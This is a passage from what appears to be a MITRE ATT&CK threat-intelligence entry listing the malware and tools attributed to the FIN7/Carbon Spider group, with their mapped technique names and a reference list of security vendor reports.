S0517 Pillowmint (Citation: CrowdStrike Carbon Spider August 2021) (Citation: Trustwave Pillowmint June 2020) Fileless Storage, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Application Shimming, Archive Collected Data, Modify Registry, Indicator Removal, Asynchronous Procedure Call, Process Discovery, PowerShell, Obfuscated Files or Information, Query Registry, Clear Persistence, File Deletion, Compression
S0488 CrackMapExec (Citation: CME Github September 2018) (Citation: CrowdStrike Carbon Spider August 2021) Windows Management Instrumentation, Password Guessing, Security Account Manager, LSA Secrets, Domain Account, Domain Groups, Network Share Discovery, System Information Discovery, Modify Registry, Password Spraying, System Network Configuration Discovery, File and Directory Discovery, System Network Connections Discovery, PowerShell, Brute Force, Password Policy Discovery, Remote System Discovery, Pass the Hash, NTDS, At
S0449 Maze (Citation: FireEye Maze May 2020) (Citation: McAfee Maze March 2020) (Citation: Microsoft Ransomware as a Service) (Citation: Sophos Maze VM September 2020) Scheduled Task, Windows Management Instrumentation, Service Stop, System Information Discovery, Msiexec, Native API, Junk Code Insertion, Indicator Removal, Dynamic Resolution, Masquerade Task or Service, System Network Connections Discovery, Process Discovery, Registry Run Keys / Startup Folder, Disable or Modify Tools, Obfuscated Files or Information, Run Virtual Instance, Data Encrypted for Impact, System Language Discovery, Windows Command Shell, Web Protocols, Dynamic-link Library Injection, Inhibit System Recovery, System Shutdown/Reboot
S0648 JSS Loader (Citation: CrowdStrike Carbon Spider August 2021) (Citation: Microsoft Ransomware as a Service) (Citation: eSentire FIN7 July 2021) Scheduled Task, JavaScript, Malicious File, Spearphishing Attachment, PowerShell, Visual Basic, Ingress Tool Transfer
S0552 AdFind (Citation: CrowdStrike Carbon Spider August 2021) (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019) (Citation: Red Canary Hospital Thwarted Ryuk October 2020) Domain Account, Domain Groups, System Network Configuration Discovery, Domain Trust Discovery, Remote System Discovery
S0681 Lizar (Citation: BiZone Lizar May 2021) (Citation: Gemini FIN7 Oct 2021) (Citation: Threatpost Lizar May 2021) (Citation: Tirion) Screen Capture, System Owner/User Discovery, System Information Discovery, Native API, Deobfuscate/Decode Files or Information, Process Injection, Email Account, Archive Collected Data, Credentials from Web Browsers, Browser Information Discovery, LSASS Memory, System Network Configuration Discovery, System Network Connections Discovery, Portable Executable Injection, Process Discovery, PowerShell, Encrypted Channel, Security Software Discovery, Windows Command Shell, Windows Credential Manager, Ingress Tool Transfer, Dynamic-link Library Injection

References

  1. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
  2. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  3. Waterman, S. (2017, October 16). Fin7 weaponization of DDE is just their latest slick move, say researchers. Retrieved November 21, 2017.
  4. The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.
  5. Gorelik, M. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.
  6. Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.
  7. CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.
  8. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  9. Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.
  10. eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels’ Owner, Brown-Forman Inc. Retrieved September 20, 2021.
  11. Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
  12. Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.
  13. Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.
  14. Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.
  15. Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.
  16. Carr, N., et al. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques. Retrieved October 11, 2019.
  17. Platt, J. and Reeves, J. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.
  18. Bohannon, D. and Carr, N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.
  19. Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  20. Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.
  21. Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.
